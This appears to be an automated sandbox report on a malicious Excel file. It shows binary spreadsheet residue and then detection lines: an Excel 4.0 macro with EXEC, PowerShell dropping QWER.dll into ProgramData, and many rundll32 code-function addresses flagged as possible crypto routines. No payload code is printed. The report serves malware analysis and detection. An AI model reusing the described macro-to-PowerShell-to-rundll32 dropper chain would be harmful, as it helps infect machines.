.L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: 80_513972285.xls Initial sample: EXEC
Source: 80_513972285.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349700 9_2_00349700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355CF9 9_2_00355CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355040 9_2_00355040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035109E 9_2_0035109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346083 9_2_00346083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003470ED 9_2_003470ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034911A 9_2_0034911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F154 9_2_0034F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A156 9_2_0035A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003541A7 9_2_003541A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359186 9_2_00359186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035026B 9_2_0035026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E243 9_2_0034E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035129C 9_2_0035129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C309 9_2_0034C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B391 9_2_0035B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C38F 9_2_0035C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D3C8 9_2_0035D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035542E 9_2_0035542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A429 9_2_0035A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B41A 9_2_0034B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0036146E 9_2_0036146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003504B8 9_2_003504B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035E498 9_2_0035E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003564F1 9_2_003564F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003444FA 9_2_003444FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003604DE 9_2_003604DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003574DD 9_2_003574DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00353512 9_2_00353512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F58F 9_2_0034F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003545CD 9_2_003545CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035363D 9_2_0035363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035561F 9_2_0035561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00363672 9_2_00363672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348650 9_2_00348650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034472E 9_2_0034472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034777B 9_2_0034777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352753 9_2_00352753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351831 9_2_00351831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342830 9_2_00342830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B821 9_2_0034B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360867 9_2_00360867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356864 9_2_00356864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E86A 9_2_0034E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C850 9_2_0034C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003488F4 9_2_003488F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D8D7 9_2_0035D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003468DE 9_2_003468DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F93D 9_2_0034F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341950 9_2_00341950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350946 9_2_00350946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034194C 9_2_0034194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C9A9 9_2_0035C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003599AA 9_2_003599AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00361993 9_2_00361993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346A1F 9_2_00346A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349A7D 9_2_00349A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CA43 9_2_0034CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AB66 9_2_0034AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00361B54 9_2_00361B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354B56 9_2_00354B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BB4B 9_2_0034BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347B82 9_2_00347B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352BF6 9_2_00352BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035EBFF 9_2_0035EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357BCA 9_2_00357BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346C29 9_2_00346C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EC9B 9_2_0034EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CC89 9_2_0035CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035ACD3 9_2_0035ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350D33 9_2_00350D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BD0F 9_2_0034BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358D71 9_2_00358D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360D5B 9_2_00360D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00353D41 9_2_00353D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348D95 9_2_00348D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034FD8C 9_2_0034FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035EE94 9_2_0035EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AE9A 9_2_0034AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BE8C 9_2_0035BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346ED6 9_2_00346ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035FF31 9_2_0035FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343FB8 9_2_00343FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342FA1 9_2_00342FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341F9B 9_2_00341F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CFCE 9_2_0034CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004374DD 10_2_004374DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004270ED 10_2_004270ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00435CF9 10_2_00435CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043BE8C 10_2_0043BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043EE94 10_2_0043EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042EC9B 10_2_0042EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043E498 10_2_0043E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00441B54 10_2_00441B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00429700 10_2_00429700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00433512 10_2_00433512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042F93D 10_2_0042F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043B391 10_2_0043B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00428D95 10_2_00428D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042CA43 10_2_0042CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042E243 10_2_0042E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00435040 10_2_00435040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042C850 10_2_0042C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00428650 10_2_00428650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00440867 10_2_00440867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00436864 10_2_00436864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042E86A 10_2_0042E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043026B 10_2_0043026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0044146E 10_2_0044146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00443672 10_2_00443672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00429A7D 10_2_00429A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042B41A 10_2_0042B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043561F 10_2_0043561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00426A1F 10_2_00426A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042B821 10_2_0042B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043A429 10_2_0043A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00426C29 10_2_00426C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043542E 10_2_0043542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00431831 10_2_00431831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00422830 10_2_00422830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043363D 10_2_0043363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043ACD3 10_2_0043ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00426ED6 10_2_00426ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043D8D7 10_2_0043D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004404DE 10_2_004404DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004268DE 10_2_004268DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004364F1 10_2_004364F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004288F4 10_2_004288F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004244FA 10_2_004244FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00426083 10_2_00426083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043CC89 10_2_0043CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042AE9A 10_2_0042AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043109E 10_2_0043109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043129C 10_2_0043129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004304B8 10_2_004304B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00433D41 10_2_00433D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00430946 10_2_00430946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042BB4B 10_2_0042BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042194C 10_2_0042194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00432753 10_2_00432753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00421950 10_2_00421950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043A156 10_2_0043A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00434B56 10_2_00434B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042F154 10_2_0042F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00440D5B 10_2_00440D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042AB66 10_2_0042AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00438D71 10_2_00438D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042777B 10_2_0042777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042C309 10_2_0042C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042BD0F 10_2_0042BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042911A 10_2_0042911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042472E 10_2_0042472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00430D33 10_2_00430D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043FF31 10_2_0043FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00437BCA 10_2_00437BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043D3C8 10_2_0043D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042CFCE 10_2_0042CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004345CD 10_2_004345CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00432BF6 10_2_00432BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043EBFF 10_2_0043EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00427B82 10_2_00427B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00439186 10_2_00439186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043C38F 10_2_0043C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042F58F 10_2_0042F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042FD8C 10_2_0042FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00441993 10_2_00441993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00421F9B 10_2_00421F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00422FA1 10_2_00422FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004341A7 10_2_004341A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004399AA 10_2_004399AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043C9A9 10_2_0043C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00423FB8 10_2_00423FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00479700 11_2_00479700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00485CF9 11_2_00485CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00485040 11_2_00485040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004770ED 11_2_004770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00476083 11_2_00476083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048109E 11_2_0048109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047F154 11_2_0047F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048A156 11_2_0048A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047911A 11_2_0047911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00489186 11_2_00489186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004841A7 11_2_004841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047E243 11_2_0047E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048026B 11_2_0048026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048129C 11_2_0048129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047C309 11_2_0047C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048D3C8 11_2_0048D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048C38F 11_2_0048C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048B391 11_2_0048B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0049146E 11_2_0049146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047B41A 11_2_0047B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048A429 11_2_0048A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048542E 11_2_0048542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004874DD 11_2_004874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004904DE 11_2_004904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004864F1 11_2_004864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004744FA 11_2_004744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048E498 11_2_0048E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004804B8 11_2_004804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00483512 11_2_00483512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004845CD 11_2_004845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047F58F 11_2_0047F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00478650 11_2_00478650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00493672 11_2_00493672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048561F 11_2_0048561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048363D 11_2_0048363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00482753 11_2_00482753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047777B 11_2_0047777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047472E 11_2_0047472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047C850 11_2_0047C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00486864 11_2_00486864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047E86A 11_2_0047E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00490867 11_2_00490867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047B821 11_2_0047B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00472830 11_2_00472830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00481831 11_2_00481831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004768DE 11_2_004768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048D8D7 11_2_0048D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004788F4 11_2_004788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047194C 11_2_0047194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00480946 11_2_00480946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00471950 11_2_00471950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047F93D 11_2_0047F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00491993 11_2_00491993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048C9A9 11_2_0048C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004899AA 11_2_004899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047CA43 11_2_0047CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00479A7D 11_2_00479A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00476A1F 11_2_00476A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047BB4B 11_2_0047BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00491B54 11_2_00491B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00484B56 11_2_00484B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047AB66 11_2_0047AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00487BCA 11_2_00487BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048EBFF 11_2_0048EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00482BF6 11_2_00482BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00477B82 11_2_00477B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00476C29 11_2_00476C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048ACD3 11_2_0048ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048CC89 11_2_0048CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047EC9B 11_2_0047EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00483D41 11_2_00483D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00490D5B 11_2_00490D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00488D71 11_2_00488D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047BD0F 11_2_0047BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00480D33 11_2_00480D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047FD8C 11_2_0047FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00478D95 11_2_00478D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00476ED6 11_2_00476ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048BE8C 11_2_0048BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048EE94 11_2_0048EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047AE9A 11_2_0047AE9A
